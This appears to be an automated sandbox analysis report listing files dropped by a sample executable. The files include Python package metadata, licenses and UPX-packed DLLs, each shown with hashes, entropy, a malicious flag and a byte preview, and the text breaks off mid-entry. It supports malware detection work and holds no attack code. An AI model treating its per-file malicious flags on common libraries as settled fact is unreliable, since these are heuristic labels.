SSDEEP:	192:j/sUYExPRtXLt5Yy9EqOmoKTioEJdQ/0GmlWEx+VqAI6OfmEIPSo9t+kwLaH:j/sW6y9EqHoKvgAml9rqOnQLy8
MD5:	7774D77D730C0C295CB6E3E46817DAD6
SHA1:	406B5C84945B8DC1035BD53EB33F289B9AE699FC
SHA-256:	CA0970517928EF943E209E8B98F550E18F7D2894B708F2B4356F28BD7158B038
SHA-512:	6E991F3144CCA536E906A180DA7FAF3198521C81EFF4143FB943ECC6C6FAA558D0B1F2AA1379A7294BAA039D67202C671027D12C821D95B859EC25E0F78C2C21
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: attrs.Version: 23.1.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: Bug Tracker, https://github.com/python-attrs/attrs/issues.Project-URL: Source Code, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: P

C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info\RECORD

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	5.797706483584544
Encrypted:	false
SSDEEP:	96:QwFmI0guUoqipQEqdwBxTGNmmUuAqG2PX2JRjiFcoqL/+Q:NBUoUTGwnuA2Xf9Q
MD5:	9F6828381D6BF7776432082C3EC4B3C4
SHA1:	03679DB96EE35CD3FB14ED343A85D6628B86700A
SHA-256:	1D8CFAF42FB9B9E79C8313175C477396A2ABD56FBA1C26B23F52A6DD76D844C7
SHA-512:	F9FE2798CAEA5E9600709A3153977D1864A69784809B97F582CBDA160380ECE90B19E7AE837E38BAF41B09E75B997FDA1EF07DDE8F6589F9C76372D85B9578D2
Malicious:	false
Preview:	attr/__init__.py,sha256=dSRUBxRVTh-dXMrMR_oQ3ZISu2QSfhSZlik03Mjbu30,3241..attr/__init__.pyi,sha256=rIK-2IakIoehVtqXK5l5rs9_fJNCbnYtKTS3cOAVJD8,17609..attr/__pycache__/__init__.cpython-311.pyc,,..attr/__pycache__/_cmp.cpython-311.pyc,,..attr/__pycache__/_compat.cpython-311.pyc,,..attr/__pycache__/_config.cpython-311.pyc,,..attr/__pycache__/_funcs.cpython-311.pyc,,..attr/__pycache__/_make.cpython-311.pyc,,..attr/__pycache__/_next_gen.cpython-311.pyc,,..attr/__pycache__/_version_info.cpython-311.pyc,,..attr/__pycache__/converters.cpython-311.pyc,,..attr/__pycache__/exceptions.cpython-311.pyc,,..attr/__pycache__/filters.cpython-311.pyc,,..attr/__pycache__/setters.cpython-311.pyc,,..attr/__pycache__/validators.cpython-311.pyc,,..attr/_cmp.py,sha256=diMUQV-BIg7IjIb6-o1hswtnjrR4qdAUz_tE8gxS96w,4098..attr/_cmp.pyi,sha256=sGQmOM0w3_K4-X8cTXR7g0Hqr290E8PTObA9JQxWQqc,399..attr/_compat.py,sha256=d3cpIu60IbKrLywPni17RUEQY7MvkqqKifyzJ5H3zRU,5803..attr/_config.py,sha256=5W8lgRePuIOWu1ZuqF1899e2CmXGc9

C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	87
Entropy (8bit):	4.699003560068366
Encrypted:	false
SSDEEP:	3:RtEeXAaCQnvxP+tPCCfA5I:Rt2PQZWBB3
MD5:	14CCD3CE79ED5ED7DAD2420CD7C0D412
SHA1:	388B959646735E0095900E61F3AF8A90F594F0A3
SHA-256:	108D89B06C9DC142F918FF6DEA4CD9BFB1B71C33E2EC5B990C37FD227E9A9913
SHA-512:	6EA1321D7F62E8284C3C5B29A3D7940890A4488503832457BF6580108351C0B2A0EE871928561DFF7F71C9BA9D1B89B2D93C1C5839EEC4815032E89E670934B4
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: hatchling 1.14.0.Root-Is-Purelib: true.Tag: py3-none-any.

C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info\licenses\LICENSE

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1109
Entropy (8bit):	5.104415762129373
Encrypted:	false
SSDEEP:	24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
MD5:	5E55731824CF9205CFABEAB9A0600887
SHA1:	243E9DD038D3D68C67D42C0C4BA80622C2A56246
SHA-256:	882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
SHA-512:	21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
Malicious:	false
Preview:	The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE

C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1439447
Entropy (8bit):	5.58639468240011
Encrypted:	false
SSDEEP:	24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
MD5:	83D235E1F5B0EE5B0282B5AB7244F6C4
SHA1:	629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
SHA-256:	DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
SHA-512:	77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
Malicious:	false
Preview:	PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\INSTALLER

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\LICENSE

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.61968998873571
Encrypted:	false
SSDEEP:	3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:	8C3617DB4FB6FAE01F1D253AB91511E4
SHA1:	E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:	3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:	77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:	false
Preview:	This software is made available under the terms of either of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of both these licenses..

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\LICENSE.APACHE

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11360
Entropy (8bit):	4.426756947907149
Encrypted:	false
SSDEEP:	192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:	4E168CCE331E5C827D4C2B68A6200E1B
SHA1:	DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:	AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:	F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\LICENSE.BSD

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1532
Entropy (8bit):	5.058591167088024
Encrypted:	false
SSDEEP:	24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:	5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:	EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:	602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:	DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:	false
Preview:	Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\METADATA

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5292
Entropy (8bit):	5.115440205505611
Encrypted:	false
SSDEEP:	96:DxapqZink/QIHQIyzQIZQILuQIR8vtklGovxNx6sWwCvCCcTKvIrrg9BMM6VwDjz:sJnkoBs/sqLz8cTKvIrrUiM6VwDjyeWs
MD5:	137D13F917D94C83137A0FA5AE12B467
SHA1:	01E93402C225BF2A4EE59F9A06F8062CB5E4801E
SHA-256:	36738E6971D2F20DB78433185A0EF7912A48544AA6FF7006505A7DC785158859
SHA-512:	1B22CBC6E22FA5E2BD5CC4A370443A342D00E7DD53330A4000E9A680DE80262BCA7188764E3568944D01025188291602AC8C53C971630984FBD9FA7D75AAB124
Malicious:	false
Preview:	Metadata-Version: 2.1..Name: cryptography..Version: 41.0.7..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\RECORD

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	15334
Entropy (8bit):	5.553002499533164
Encrypted:	false
SSDEEP:	384:3X6sU/ZfaigkeVJN5Z6FGotqw+x6uvnPLEC:3rUxfzpctZEC
MD5:	01D6F364CA042C116453ABF648A87B02
SHA1:	90051BD2E7ADC4AD53CB0913F6BF3891CEFC183B
SHA-256:	1FCFEEB6B0602FA89476E97AD5BF77ABAEF98E2C64AC9B67E030A2DBF40B3ABC
SHA-512:	C0E24967A3EBC03625B1D5FAFBD025F58C55EFC8D785451C92FE8F4446D7C5A0321AEC5805D8575F06E2858202555DF5F48E54CA5F5E10E45876FB814D777C8A
Malicious:	false
Preview:	cryptography-41.0.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-41.0.7.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-41.0.7.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-41.0.7.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-41.0.7.dist-info/METADATA,sha256=NnOOaXHS8g23hDMYWg73kSpIVEqm_3AGUFp9x4UViFk,5292..cryptography-41.0.7.dist-info/RECORD,,..cryptography-41.0.7.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-41.0.7.dist-info/WHEEL,sha256=-EX5DQzNGQEoyL99Q-0P0-D-CXbfqafenaAeiSQ_Ufk,100..cryptography-41.0.7.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=uPXMbbcptt7EzZ_jllGRx0pVdMn-NBsAM4L74hOv-b0,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\WHEEL

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.0203365408149025
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVlbY3KgP+tkKc/SKQLn:RtBMwlVCxWKxDQLn
MD5:	4B432A99682DE414B29A683A3546B69F
SHA1:	F59C5016889EE5E9F62D09B22AEFBC2211A56C93
SHA-256:	F845F90D0CCD190128C8BF7D43ED0FD3E0FE0976DFA9A7DE9DA01E89243F51F9
SHA-512:	CBBF10E19B6F4072C416EA95D7AE259B9C5A1B89068B7B6660B7C637D6F2437AEA8D8202A2E26A0BEC36DAECD8BBB6B59016FC2DDEB13C545F0868B3E15479CA
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp37-abi3-win_amd64..

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info\top_level.txt

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	13
Entropy (8bit):	3.2389012566026314
Encrypted:	false
SSDEEP:	3:cOv:Nv
MD5:	E7274BD06FF93210298E7117D11EA631
SHA1:	7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
SHA-256:	28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
SHA-512:	AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
Malicious:	false
Preview:	cryptography.

C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography\hazmat\bindings\_rust.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.9996350995616154
Encrypted:	true
SSDEEP:	49152:Tg6GLR/q8qaC5va+9Vu9tVGN7DfibklDIQY:TgI8qaCh2gN3gkllY
MD5:	479ABE4911142DA99E07D6C608F6E4CB
SHA1:	72C28688A36B0A00CCDFA704BE2F3E20BBAFE3F8
SHA-256:	D9CC4C2CAC4406D91A98CB9A62F80C5848F182662B2257B5611B6F5B22797446
SHA-512:	59FC8B5F9309A7A6B5A41C0DDFD0FA14C14C0A6EFE2F90EAA7659D0A417F66138404975C684A8AAAE5A00FF3DD6D8919B0FE316DC7294102C0FD6A5C70920861
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......QN.../.../.../...W(../......./......./......./......./...R.../...Z.../..^W.../.../...-../...",......./.../.../......./......./..Rich./..........PE..d...M7ee.........." ...&.P.......`I..f..pI...................................f...........`.........................................$.f.p.....f.$............Pb...............f.$.............................f.(...@.f.@...........................................UPX0.....`I.............................UPX1.....P...pI..L..................@...UPX2..........f......P..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\frozenlist\_frozenlist.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	7.843168848110761
Encrypted:	false
SSDEEP:	768:5S6WTnXeaMytX+TkQ5l1b2YyvPBsDNFyMCipcL:5S6WDuaM6XuvZyuaMEL
MD5:	15B0DF96344BAF6A4C72766721943E52
SHA1:	A3666E88594D1EC97DE23B9242F346C43A34C070
SHA-256:	ABB6F497003738DB2407B01DFA0ABC61F6BC7FDB2452C52F76AB11F5430D844F
SHA-512:	4FBF295D0882646B8C4B3284F11331FB12767FD1404D78D3E4D88A434896058C2DF05DD1A2D9C8CE696D2D3AAD8C7251D00D95C399DF2E8C11BB319F87A4385E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!\5.@2f.@2f.@2f.8.f.@2f.?3g.@2f.83g.@2f.?7g.@2f.?6g.@2f.?1g.@2fK=3g.@2f.@3f.@2f..:g.@2f..2g.@2f...f.@2f..0g.@2fRich.@2f................PE..d.....{e.........." ...%.........0.......@................................................`.............................................h....................p..(.......................................................@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1189728
Entropy (8bit):	7.945107908450931
Encrypted:	false
SSDEEP:	24576:LffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:rf8JWwgho5HL3fknPSIKorCU1CPwDv3a
MD5:	86CFC84F8407AB1BE6CC64A9702882EF
SHA1:	86F3C502ED64DF2A5E10B085103C2FFC9E3A4130
SHA-256:	11B89CC5531B2A6B89FBBB406EBE8FB01F0BF789E672131B0354E10F9E091307
SHA-512:	B33F59497127CB1B4C1781693380576187C562563A9E367CE8ABC14C97C51053A28AF559CDD8BD66181012083E562C8A8771E3D46ADEBA269A848153A8E9173C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25336
Entropy (8bit):	7.563490694087984
Encrypted:	false
SSDEEP:	384:2Jvjb6KaBBu0wYkP2C0yZbMRpZa7gJXMrRCXPDG4y8c3UhH3:Ovj+3BcMp8KDG4yshH
MD5:	DECBBA3ADD4C2246928AB385FB16A21E
SHA1:	5F019EFF11DE3122FFA67A06D52D446A3448B75E
SHA-256:	4B43C1E42F6050DDB8E184C8EC4FB1DE4A6001E068ECE8E6AD47DE0CC9FD4A2D
SHA-512:	760A42A3EB3CA13FA7B95D3BD0F411C270594AE3CF1D3CDA349FA4F8B06EBE548B60CD438D68E2DA37DE0BC6F1C711823F5E917DA02ED7047A45779EE08D7012
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....@................................................................`.....................................................................8.......................................................8...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-1_1.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	208224
Entropy (8bit):	7.9214932539909775
Encrypted:	false
SSDEEP:	3072:FSI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:AIek5VC0FiHof6Z1rgJ63R/oS3
MD5:	6CD33578BC5629930329CA3303F0FAE1
SHA1:	F2F8E3248A72F98D27F0CFA0010E32175A18487F
SHA-256:	4150EE603AD2DA7A6CB6A895CB5BD928E3A99AF7E73C604DE1FC224E0809FDB0
SHA-512:	C236A6CCC8577C85509D378C1EF014621CAB6F6F4AA26796FF32D8EEC8E98DED2E55D358A7D236594F7A48646DC2A6BF25B42A37AED549440D52873EBCA4713E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p..p..p......p...+..p.\.+..p.../..p......p...)..p...+..p..p+.iq......p.....p.....p...(..p.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\multidict\_multidict.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	7.534455026643793
Encrypted:	false
SSDEEP:	384:RNZQdJoIfKNLk4/eQN4g+qza+/L5QfNVknydZa7gJXMn88:pQd6k0N4gFuYNQfN1p8n
MD5:	4E3B9E13C6A95D88429CE6ADE7D0756F
SHA1:	673D0999EC954C284C30619E0B5FA6FEB9FA15CE
SHA-256:	E5969C7DE6510AB57293C78F84A07ABBE2D5847D810CFE1DE34C62CE5CAD4BBF
SHA-512:	C9185D0354431051F3E2724E37EDF774057F2FA570BD4BF5DCCE2B363BDA2BFA1198927424E3E81A658FB86722F1D40D8EB21D332224C62B5E96875F61776738
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........IT..'...'...'.......'..&...'...&...'.."...'..#...'..$...'.0.&...'...&...'.../...'...'...'.......'...%...'.Rich..'.........PE..d...#X.c.........." ...".P..........`........................................@............`.........................................@2..d....0..P....0.......................2......................................`%..@...........................................UPX0....................................UPX1.....P.......H..................@....rsrc........0.......L..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88440
Entropy (8bit):	7.91548450445375
Encrypted:	false
SSDEEP:	1536:ad2ZG27LFRlz41ZjiW6lNaE+hCsoVZ268gtw9IV1upHqCnqEIDQhFh7SyDPxB:ad2ZVLZs2W6lNatksmlBtIIV1oFIDQhF
MD5:	FE0E32BFE3764ED5321454E1A01C81EC
SHA1:	7690690DF0A73BDCC54F0F04B674FC8A9A8F45FB
SHA-256:	B399BFF10812E9EA2C9800F74CB0E5002F9D9379BAF1A3CEF9D438CACA35DC92
SHA-512:	D1777F9E684A9E4174E18651E6D921AE11757ECDBEB4EE678C6A28E0903A4B9AB9F6E1419670B4D428EE20F86C7D424177ED9DAF4365CF2EE376FCD065C1C92D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1..1..1..IX..1..J..1..J..1..J..1..J..1..J..1.\C..1..1..1..J..1..J..1..J4..1..J..1.Rich.1.................PE..d...k.Vc.........." ...!. ..........@0... ...................................P............`..........................................L..P....I.......@.......................L......................................@<..@...........................................UPX0....................................UPX1..... ... ......................@....rsrc........@......."..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\python3.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65920
Entropy (8bit):	6.085964919090515
Encrypted:	false
SSDEEP:	768:Apw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJU:V/5k8cnzeJH9IDQ0K7SyOPx
MD5:	34E49BB1DFDDF6037F0001D9AEFE7D61
SHA1:	A25A39DCA11CDC195C9ECD49E95657A3E4FE3215
SHA-256:	4055D1B9E553B78C244143AB6B48151604003B39A9BF54879DEE9175455C1281
SHA-512:	EDB715654BAAF499CF788BCACD5657ADCF9F20B37B02671ABE71BDA334629344415ED3A7E95CB51164E66A7AA3ED4BF84ACB05649CCD55E3F64036F3178B7856
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q...e...e...e..km...e..ke...e..k....e..kg...e.Rich..e.................PE..d...\.Vc.........." ...!..................................................................`.........................................`...P................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1701240
Entropy (8bit):	7.993696827956843
Encrypted:	true
SSDEEP:	49152:I0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:nziPwCvZalhXOMIzQd
MD5:	DB09C9BBEC6134DB1766D369C339A0A1
